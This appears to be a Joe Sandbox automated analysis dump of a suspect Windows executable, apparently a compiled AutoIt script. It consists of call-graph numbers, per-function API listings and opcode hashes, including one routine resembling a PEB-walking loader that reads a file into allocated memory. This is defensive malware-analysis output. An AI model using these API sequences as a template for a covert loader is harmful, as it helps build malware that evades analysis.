97275 7850f5 40 API calls 97274->97275 97276 7f2dd8 97275->97276 97277 7f28fe 27 API calls 97276->97277 97279 7f2dee 97277->97279 97278->97162 97279->97278 97280 7f22ce 79 API calls 97279->97280 97280->97278 97281->97176 97282->97180 97283->97186 97284->97195 97285->97204 97286 1e423b0 97300 1e40000 97286->97300 97288 1e4244f 97303 1e422a0 97288->97303 97306 1e43480 GetPEB 97300->97306 97302 1e4068b 97302->97288 97304 1e422a9 Sleep 97303->97304 97305 1e422b7 97304->97305 97307 1e434aa 97306->97307 97307->97302 97308 781cad SystemParametersInfoW 97309 7b8402 97314 7b81be 97309->97314 97312 7b842a 97319 7b81ef try_get_first_available_module 97314->97319 97316 7b83ee 97333 7b27ec 26 API calls pre_c_initialization 97316->97333 97318 7b8343 97318->97312 97326 7c0984 97318->97326 97325 7b8338 97319->97325 97329 7a8e0b 40 API calls 2 library calls 97319->97329 97321 7b838c 97321->97325 97330 7a8e0b 40 API calls 2 library calls 97321->97330 97323 7b83ab 97323->97325 97331 7a8e0b 40 API calls 2 library calls 97323->97331 97325->97318 97332 7af2d9 20 API calls __dosmaperr 97325->97332 97334 7c0081 97326->97334 97328 7c099f 97328->97312 97329->97321 97330->97323 97331->97325 97332->97316 97333->97318 97335 7c008d ___BuildCatchObject 97334->97335 97336 7c009b 97335->97336 97339 7c00d4 97335->97339 97391 7af2d9 20 API calls __dosmaperr 97336->97391 97338 7c00a0 97392 7b27ec 26 API calls pre_c_initialization 97338->97392 97345 7c065b 97339->97345 97344 7c00aa __wsopen_s 97344->97328 97346 7c0678 97345->97346 97347 7c068d 97346->97347 97348 7c06a6 97346->97348 97408 7af2c6 20 API calls __dosmaperr 97347->97408 97394 7b5221 97348->97394 97351 7c06ab 97353 7c06cb 97351->97353 97354 7c06b4 97351->97354 97352 7c0692 97409 7af2d9 20 API calls __dosmaperr 97352->97409 97407 7c039a CreateFileW 97353->97407 97410 7af2c6 20 API calls __dosmaperr 97354->97410 97358 7c06b9 97411 7af2d9 20 API calls __dosmaperr 97358->97411 97359 7c00f8 97393 7c0121 LeaveCriticalSection __wsopen_s 97359->97393 97361 7c0781 GetFileType 97362 7c078c GetLastError 97361->97362 97363 7c07d3 97361->97363 97414 7af2a3 20 API calls __dosmaperr 97362->97414 97416 7b516a 21 API calls 2 library calls 97363->97416 97364 7c0756 GetLastError 97413 7af2a3 20 API calls __dosmaperr 97364->97413 97367 7c0704 97367->97361 97367->97364 97412 7c039a CreateFileW 97367->97412 97368 7c079a CloseHandle 97368->97352 97370 7c07c3 97368->97370 97415 7af2d9 20 API calls __dosmaperr 97370->97415 97372 7c0749 97372->97361 97372->97364 97373 7c07f4 97375 7c0840 97373->97375 97417 7c05ab 72 API calls 3 library calls 97373->97417 97380 7c086d 97375->97380 97418 7c014d 72 API calls 4 library calls 97375->97418 97376 7c07c8 97376->97352 97379 7c0866 97379->97380 97381 7c087e 97379->97381 97382 7b86ae __wsopen_s 29 API calls 97380->97382 97381->97359 97383 7c08fc CloseHandle 97381->97383 97382->97359 97419 7c039a CreateFileW 97383->97419 97385 7c0927 97386 7c0931 GetLastError 97385->97386 97387 7c095d 97385->97387 97420 7af2a3 20 API calls __dosmaperr 97386->97420 97387->97359 97389 7c093d 97421 7b5333 21 API calls 2 library calls 97389->97421 97391->97338 97392->97344 97393->97344 97395 7b522d ___BuildCatchObject 97394->97395 97422 7b2f5e EnterCriticalSection 97395->97422 97397 7b5234 97399 7b5259 97397->97399 97402 7b52c7 EnterCriticalSection 97397->97402 97404 7b527b 97397->97404 97400 7b5000 __wsopen_s 21 API calls 97399->97400 97403 7b525e 97400->97403 97401 7b52a4 __wsopen_s 97401->97351 97402->97404 97405 7b52d4 LeaveCriticalSection 97402->97405 97403->97404 97426 7b5147 EnterCriticalSection 97403->97426 97423 7b532a 97404->97423 97405->97397 97407->97367 97408->97352 97409->97359 97410->97358 97411->97352 97412->97372 97413->97352 97414->97368 97415->97376 97416->97373 97417->97375 97418->97379 97419->97385 97420->97389 97421->97387 97422->97397 97427 7b2fa6 LeaveCriticalSection 97423->97427 97425 7b5331 97425->97401 97426->97404 97427->97425 97428 7c2ba5 97429 7c2baf 97428->97429 97430 782b25 97428->97430 97432 783a5a 24 API calls 97429->97432 97456 782b83 7 API calls 97430->97456 97434 7c2bb8 97432->97434 97436 789cb3 22 API calls 97434->97436 97438 7c2bc6 97436->97438 97437 782b2f 97442 783837 49 API calls 97437->97442 97445 782b44 97437->97445 97439 7c2bce 97438->97439 97440 7c2bf5 97438->97440 97441 7833c6 22 API calls 97439->97441 97443 7833c6 22 API calls 97440->97443 97444 7c2bd9 97441->97444 97442->97445 97455 7c2bf1 GetForegroundWindow ShellExecuteW 97443->97455 97447 786350 22 API calls 97444->97447 97450 782b5f 97445->97450 97460 7830f2 Shell_NotifyIconW ___scrt_fastfail 97445->97460 97451 7c2be7 97447->97451 97449 7c2c26 97449->97450 97452 782b66 SetCurrentDirectoryW 97450->97452 97453 7833c6 22 API calls 97451->97453 97454 782b7a 97452->97454 97453->97455 97455->97449 97461 782cd4 7 API calls 97456->97461 97458 782b2a 97459 782c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97458->97459 97459->97437 97460->97450 97461->97458 97462 782de3 97463 782df0 __wsopen_s 97462->97463 97464 782e09 97463->97464 97465 7c2c2b ___scrt_fastfail 97463->97465 97466 783aa2 23 API calls 97464->97466 97468 7c2c47 GetOpenFileNameW 97465->97468 97467 782e12 97466->97467 97478 782da5 97467->97478 97469 7c2c96 97468->97469 97471 786b57 22 API calls 97469->97471 97473 7c2cab 97471->97473 97473->97473 97475 782e27 97496 7844a8 97475->97496 97479 7c1f50 __wsopen_s 97478->97479 97480 782db2 GetLongPathNameW 97479->97480 97481 786b57 22 API calls 97480->97481 97482 782dda 97481->97482 97483 783598 97482->97483 97484 78a961 22 API calls 97483->97484 97485 7835aa 97484->97485 97486 783aa2 23 API calls 97485->97486 97487 7835b5 97486->97487 97488 7835c0 97487->97488 97492 7c32eb 97487->97492 97489 78515f 22 API calls 97488->97489 97491 7835cc 97489->97491 97526 7835f3 97491->97526 97494 7c330d 97492->97494 97532 79ce60 41 API calls 97492->97532 97495 7835df 97495->97475 97497 784ecb 94 API calls 97496->97497 97498 7844cd 97497->97498 97499 7c3833 97498->97499 97501 784ecb 94 API calls 97498->97501 97500 7f2cf9 80 API calls 97499->97500 97502 7c3848 97500->97502 97503 7844e1 97501->97503 97504 7c384c 97502->97504 97505 7c3869 97502->97505 97503->97499 97506 7844e9 97503->97506 97507 784f39 68 API calls 97504->97507 97508 79fe0b 22 API calls 97505->97508 97509 7c3854 97506->97509 97510 7844f5 97506->97510 97507->97509 97525 7c38ae 97508->97525 97543 7eda5a 82 API calls 97509->97543 97542 78940c 136 API calls 2 library calls 97510->97542 97513 7c3862 97513->97505 97514 782e31 97515 7c3a5f 97520 7c3a67 97515->97520 97516 784f39 68 API calls 97516->97520 97517 78a4a1 22 API calls 97517->97525 97520->97516 97546 7e989b 82 API calls __wsopen_s 97520->97546 97522 789cb3 22 API calls 97522->97525 97525->97515 97525->97517 97525->97520 97525->97522 97533 7e967e 97525->97533 97536 783ff7 97525->97536 97544 7e95ad 42 API calls _wcslen 97525->97544 97545 7f0b5a 22 API calls 97525->97545 97527 783605 97526->97527 97531 783624 __fread_nolock 97526->97531 97529 79fe0b 22 API calls 97527->97529 97528 79fddb 22 API calls 97530 78363b 97528->97530 97529->97531 97530->97495 97531->97528 97532->97492 97534 79fe0b 22 API calls 97533->97534 97535 7e96ae __fread_nolock 97534->97535 97535->97525 97537 78400a 97536->97537 97540 7840ae 97536->97540 97539 79fe0b 22 API calls 97537->97539 97541 78403c 97537->97541 97538 79fddb 22 API calls 97538->97541 97539->97541 97540->97525 97541->97538 97541->97540 97542->97514 97543->97513 97544->97525 97545->97525 97546->97520 97547 781044 97552 7810f3 97547->97552 97549 78104a 97588 7a00a3 29 API calls __onexit 97549->97588 97551 781054 97589 781398 97552->97589 97556 78116a 97557 78a961 22 API calls 97556->97557 97558 781174 97557->97558 97559 78a961 22 API calls 97558->97559 97560 78117e 97559->97560 97561 78a961 22 API calls 97560->97561 97562 781188 97561->97562 97563 78a961 22 API calls 97562->97563 97564 7811c6 97563->97564 97565 78a961 22 API calls 97564->97565 97566 781292 97565->97566 97599 78171c 97566->97599 97570 7812c4 97571 78a961 22 API calls 97570->97571 97572 7812ce 97571->97572 97573 791940 9 API calls 97572->97573 97574 7812f9 97573->97574 97620 781aab 97574->97620 97576 781315 97577 781325 GetStdHandle 97576->97577 97578 78137a 97577->97578 97579 7c2485 97577->97579 97583 781387 OleInitialize 97578->97583 97579->97578 97580 7c248e 97579->97580 97581 79fddb 22 API calls 97580->97581 97582 7c2495 97581->97582 97627 7f011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97582->97627 97583->97549 97585 7c249e 97628 7f0944 CreateThread 97585->97628 97587 7c24aa CloseHandle 97587->97578 97588->97551 97629 7813f1 97589->97629 97592 7813f1 22 API calls 97593 7813d0 97592->97593 97594 78a961 22 API calls 97593->97594 97595 7813dc 97594->97595 97596 786b57 22 API calls 97595->97596 97597 781129 97596->97597 97598 781bc3 6 API calls 97597->97598 97598->97556 97600 78a961 22 API calls 97599->97600 97601 78172c 97600->97601 97602 78a961 22 API calls 97601->97602 97603 781734 97602->97603 97604 78a961 22 API calls 97603->97604 97605 78174f 97604->97605 97606 79fddb 22 API calls 97605->97606 97607 78129c 97606->97607 97608 781b4a 97607->97608 97609 781b58 97608->97609 97610 78a961 22 API calls 97609->97610 97611 781b63 97610->97611 97612 78a961 22 API calls 97611->97612 97613 781b6e 97612->97613 97614 78a961 22 API calls 97613->97614 97615 781b79 97614->97615 97616 78a961 22 API calls 97615->97616 97617 781b84 97616->97617 97618 79fddb 22 API calls 97617->97618 97619 781b96 RegisterWindowMessageW 97618->97619 97619->97570 97621 7c272d 97620->97621 97622 781abb 97620->97622 97636 7f3209 23 API calls 97621->97636 97624 79fddb 22 API calls 97622->97624 97626 781ac3 97624->97626 97625 7c2738 97626->97576 97627->97585 97628->97587 97637 7f092a 28 API calls 97628->97637 97630 78a961 22 API calls 97629->97630 97631 7813fc 97630->97631 97632 78a961 22 API calls 97631->97632 97633 781404 97632->97633 97634 78a961 22 API calls 97633->97634 97635 7813c6 97634->97635 97635->97592 97636->97625 97638 7d2a00 97652 78d7b0 ISource 97638->97652 97639 78db11 PeekMessageW 97639->97652 97640 78d807 GetInputState 97640->97639 97640->97652 97642 7d1cbe TranslateAcceleratorW 97642->97652 97643 78db8f PeekMessageW 97643->97652 97644 78db73 TranslateMessage DispatchMessageW 97644->97643 97645 78da04 timeGetTime 97645->97652 97646 78dbaf Sleep 97663 78dbc0 97646->97663 97647 7d2b74 Sleep 97647->97663 97648 7d1dda timeGetTime 97705 79e300 23 API calls 97648->97705 97649 79e551 timeGetTime 97649->97663 97652->97639 97652->97640 97652->97642 97652->97643 97652->97644 97652->97645 97652->97646 97652->97647 97652->97648 97655 78d9d5 97652->97655 97666 78ec40 235 API calls 97652->97666 97667 78bf40 235 API calls 97652->97667 97668 791310 235 API calls 97652->97668 97670 78dd50 97652->97670 97677 78dfd0 97652->97677 97700 79edf6 97652->97700 97706 7f3a2a 23 API calls 97652->97706 97707 7f359c 82 API calls __wsopen_s 97652->97707 97653 7d2c0b GetExitCodeProcess 97657 7d2c37 CloseHandle 97653->97657 97658 7d2c21 WaitForSingleObject 97653->97658 97654 8129bf GetForegroundWindow 97654->97663 97657->97663 97658->97652 97658->97657 97659 7d2a31 97659->97655 97660 7d2ca9 Sleep 97660->97652 97663->97649 97663->97652 97663->97653 97663->97654 97663->97655 97663->97659 97663->97660 97708 805658 23 API calls 97663->97708 97709 7ee97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97663->97709 97710 7ed4dc 47 API calls 97663->97710 97666->97652 97667->97652 97668->97652 97671 78dd6f 97670->97671 97672 78dd83 97670->97672 97711 78d260 235 API calls 2 library calls 97671->97711 97712 7f359c 82 API calls __wsopen_s 97672->97712 97674 78dd7a 97674->97652 97676 7d2f75 97676->97676 97678 78e010 97677->97678 97689 78e0dc ISource 97678->97689 97715 7a0242 5 API calls __Init_thread_wait 97678->97715 97679 78ec40 235 API calls 97679->97689 97682 7d2fca 97684 78a961 22 API calls 97682->97684 97682->97689 97683 78a961 22 API calls 97683->97689 97687 7d2fe4 97684->97687 97716 7a00a3 29 API calls __onexit 97687->97716 97689->97679 97689->97683 97694 78a8c7 22 API calls 97689->97694 97695 7904f0 22 API calls 97689->97695 97696 7f359c 82 API calls 97689->97696 97697 78e3e1 97689->97697 97713 78a81b 41 API calls 97689->97713 97714 79a308 235 API calls 97689->97714 97718 7a0242 5 API calls __Init_thread_wait 97689->97718 97719 7a00a3 29 API calls __onexit 97689->97719 97720 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97689->97720 97721 8047d4 235 API calls 97689->97721 97722 8068c1 235 API calls 97689->97722 97690 7d2fee 97717 7a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97690->97717 97694->97689 97695->97689 97696->97689 97697->97652 97701 79ee09 97700->97701 97702 79ee12 97700->97702 97701->97652 97702->97701 97703 79ee36 IsDialogMessageW 97702->97703 97704 7defaf GetClassLongW 97702->97704 97703->97701 97703->97702 97704->97702 97704->97703 97705->97652 97706->97652 97707->97652 97708->97663 97709->97663 97710->97663 97711->97674 97712->97676 97713->97689 97714->97689 97715->97682 97716->97690 97717->97689 97718->97689 97719->97689 97720->97689 97721->97689 97722->97689 97723 1e4295b 97726 1e425d0 97723->97726 97725 1e429a7 97727 1e40000 GetPEB 97726->97727 97736 1e4266f 97727->97736 97729 1e426a0 CreateFileW 97732 1e426ad 97729->97732 97729->97736 97730 1e426c9 VirtualAlloc 97731 1e426ea ReadFile 97730->97731 97730->97732 97731->97732 97733 1e42708 VirtualAlloc 97731->97733 97734 1e428bc VirtualFree 97732->97734 97735 1e428ca 97732->97735 97733->97732 97733->97736 97734->97735 97735->97725 97736->97730 97736->97732 97737 1e427d0 FindCloseChangeNotification 97736->97737 97738 1e427e0 VirtualFree 97736->97738 97739 1e434e0 GetPEB 97736->97739 97737->97736 97738->97736 97740 1e4350a 97739->97740 97740->97729

                                    Executed Functions

                                    Function 007842DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 245 7842de-78434d call 78a961 GetVersionExW call 786b57 250 7c3617-7c362a 245->250 251 784353 245->251 252 7c362b-7c362f 250->252 253 784355-784357 251->253 254 7c3631 252->254 255 7c3632-7c363e 252->255 256 78435d-7843bc call 7893b2 call 7837a0 253->256 257 7c3656 253->257 254->255 255->252 258 7c3640-7c3642 255->258 272 7c37df-7c37e6 256->272 273 7843c2-7843c4 256->273 261 7c365d-7c3660 257->261 258->253 260 7c3648-7c364f 258->260 260->250 263 7c3651 260->263 264 78441b-784435 GetCurrentProcess IsWow64Process 261->264 265 7c3666-7c36a8 261->265 263->257 267 784494-78449a 264->267 268 784437 264->268 265->264 269 7c36ae-7c36b1 265->269 271 78443d-784449 267->271 268->271 274 7c36db-7c36e5 269->274 275 7c36b3-7c36bd 269->275 281 78444f-78445e LoadLibraryA 271->281 282 7c3824-7c3828 GetSystemInfo 271->282 277 7c37e8 272->277 278 7c3806-7c3809 272->278 273->261 276 7843ca-7843dd 273->276 279 7c36f8-7c3702 274->279 280 7c36e7-7c36f3 274->280 283 7c36bf-7c36c5 275->283 284 7c36ca-7c36d6 275->284 285 7c3726-7c372f 276->285 286 7843e3-7843e5 276->286 287 7c37ee 277->287 290 7c380b-7c381a 278->290 291 7c37f4-7c37fc 278->291 288 7c3704-7c3710 279->288 289 7c3715-7c3721 279->289 280->264 292 78449c-7844a6 GetSystemInfo 281->292 293 784460-78446e GetProcAddress 281->293 283->264 284->264 297 7c373c-7c3748 285->297 298 7c3731-7c3737 285->298 295 7c374d-7c3762 286->295 296 7843eb-7843ee 286->296 287->291 288->264 289->264 290->287 299 7c381c-7c3822 290->299 291->278 294 784476-784478 292->294 293->292 300 784470-784474 GetNativeSystemInfo 293->300 305 78447a-78447b FreeLibrary 294->305 306 784481-784493 294->306 303 7c376f-7c377b 295->303 304 7c3764-7c376a 295->304 301 7843f4-78440f 296->301 302 7c3791-7c3794 296->302 297->264 298->264 299->291 300->294 307 7c3780-7c378c 301->307 308 784415 301->308 302->264 309 7c379a-7c37c1 302->309 303->264 304->264 305->306 307->264 308->264 310 7c37ce-7c37da 309->310 311 7c37c3-7c37c9 309->311 310->264 311->264
                                    APIs
                                    • GetVersionExW.KERNEL32(?), ref: 0078430D
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • GetCurrentProcess.KERNEL32(?,0081CB64,00000000,?,?), ref: 00784422
                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00784429
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00784454
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00784466
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00784474
                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0078447B
                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 007844A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                    • API String ID: 3290436268-3101561225
                                    • Opcode ID: b5b7f992073d36f137be756c1e0165b287d964548d8c576c3955af1f9ff0588d
                                    • Instruction ID: 4996ed424bab1327820c0db2e9c670f844569f0a017dcb0c8864157b37595510
                                    • Opcode Fuzzy Hash: b5b7f992073d36f137be756c1e0165b287d964548d8c576c3955af1f9ff0588d
                                    • Instruction Fuzzy Hash: 88A1A36294A3C1DFCF11D769BCAD7D67FA87F36346B18889DD04593B22D26C4908CB21
                                    Function 007842A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 672 7842a2-7842ba CreateStreamOnHGlobal 673 7842da-7842dd 672->673 674 7842bc-7842d3 FindResourceExW 672->674 675 7842d9 674->675 676 7c35ba-7c35c9 LoadResource 674->676 675->673 676->675 677 7c35cf-7c35dd SizeofResource 676->677 677->675 678 7c35e3-7c35ee LockResource 677->678 678->675 679 7c35f4-7c3612 678->679 679->675
                                    APIs
                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007850AA,?,?,00000000,00000000), ref: 007842B2
                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007850AA,?,?,00000000,00000000), ref: 007842C9
                                    • LoadResource.KERNEL32(?,00000000,?,?,007850AA,?,?,00000000,00000000,?,?,?,?,?,?,00784F20), ref: 007C35BE
                                    • SizeofResource.KERNEL32(?,00000000,?,?,007850AA,?,?,00000000,00000000,?,?,?,?,?,?,00784F20), ref: 007C35D3
                                    • LockResource.KERNEL32(007850AA,?,?,007850AA,?,?,00000000,00000000,?,?,?,?,?,?,00784F20,?), ref: 007C35E6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                    • String ID: SCRIPT
                                    • API String ID: 3051347437-3967369404
                                    • Opcode ID: 3fe808b3113d7f22fd93221cb6423337d5096e75baf30fbbe0322f89d6276910
                                    • Instruction ID: ef1732534c2883aedaf8d879373e9ec8c1d31d1500cf4a28553897e9ec73cfaf
                                    • Opcode Fuzzy Hash: 3fe808b3113d7f22fd93221cb6423337d5096e75baf30fbbe0322f89d6276910
                                    • Instruction Fuzzy Hash: F3117C75284705BFDB219B65DC48F677BBEFFC9B55F10816DB412D6250DBB1D8008620
                                    Function 007C2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00782B6B
                                      • Part of subcall function 00783A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00851418,?,00782E7F,?,?,?,00000000), ref: 00783A78
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00842224), ref: 007C2C10
                                    • ShellExecuteW.SHELL32(00000000,?,?,00842224), ref: 007C2C17
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                    • String ID: runas
                                    • API String ID: 448630720-4000483414
                                    • Opcode ID: b3f41b023ab3d42cbc76301e6c081ecf37088b004774736f923a83a02461ef00
                                    • Instruction ID: 7d7cdce4b32ca2db0f4747778c38405f2c52b1ccb4b29a77b9a65c41f74b6ce6
                                    • Opcode Fuzzy Hash: b3f41b023ab3d42cbc76301e6c081ecf37088b004774736f923a83a02461ef00
                                    • Instruction Fuzzy Hash: 9811E471288305EACB04FF64D859ABEBBA9FF90751F44142DF142920A3DF2D8A0A8712
                                    Function 007EDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?,007C5222), ref: 007EDBCE
                                    • GetFileAttributesW.KERNELBASE(?), ref: 007EDBDD
                                    • FindFirstFileW.KERNELBASE(?,?), ref: 007EDBEE
                                    • FindClose.KERNEL32(00000000), ref: 007EDBFA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                    • String ID:
                                    • API String ID: 2695905019-0
                                    • Opcode ID: 40e21dcaa06efc00a75d07b1d58a2927aef26bc420b95c29735e43c16e335d13
                                    • Instruction ID: 26470e24db213bb07d9ac14d9e4e7614eb07dbc580a1be38100d92b4d871a0b4
                                    • Opcode Fuzzy Hash: 40e21dcaa06efc00a75d07b1d58a2927aef26bc420b95c29735e43c16e335d13
                                    • Instruction Fuzzy Hash: E7F0E5308519106B82306B7CAC0D8EA376CAE05378F208702F836C20F0EBB85D64C6E6
                                    Function 0078D730 Relevance: 21.6, APIs: 14, Instructions: 631sleepsynchronizationtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetInputState.USER32 ref: 0078D807
                                    • timeGetTime.WINMM ref: 0078DA07
                                    • Sleep.KERNEL32(0000000A), ref: 0078DBB1
                                    • Sleep.KERNEL32(0000000A), ref: 007D2B76
                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 007D2C11
                                    • WaitForSingleObject.KERNEL32(?,00000000), ref: 007D2C29
                                    • CloseHandle.KERNEL32(?), ref: 007D2C3D
                                    • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 007D2CA9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
                                    • String ID:
                                    • API String ID: 388478766-0
                                    • Opcode ID: f23c190254a2c9946270904fad068af2e6640cc176af2b68e3a04a9cb616d5e2
                                    • Instruction ID: 209861818b4a19278e6535b9a43df2f0675167516915ef1593f6b4f7dd9f9333
                                    • Opcode Fuzzy Hash: f23c190254a2c9946270904fad068af2e6640cc176af2b68e3a04a9cb616d5e2
                                    • Instruction Fuzzy Hash: 2242DD70688241EFDB38EF24C848BAABBB1FF95314F14851AE455873D2D778AC45CB92
                                    Function 00782CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00782D07
                                    • RegisterClassExW.USER32(00000030), ref: 00782D31
                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00782D42
                                    • InitCommonControlsEx.COMCTL32(?), ref: 00782D5F
                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00782D6F
                                    • LoadIconW.USER32(000000A9), ref: 00782D85
                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00782D94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 2914291525-1005189915
                                    • Opcode ID: 149c68e5265c1900566d1ae75d31918cb891c77b297c0d94771cb0c00aa5c954
                                    • Instruction ID: a00ba247abcfd9bb3db712929f0df51c5c8424a73e47c37af81384046e3e9b3a
                                    • Opcode Fuzzy Hash: 149c68e5265c1900566d1ae75d31918cb891c77b297c0d94771cb0c00aa5c954
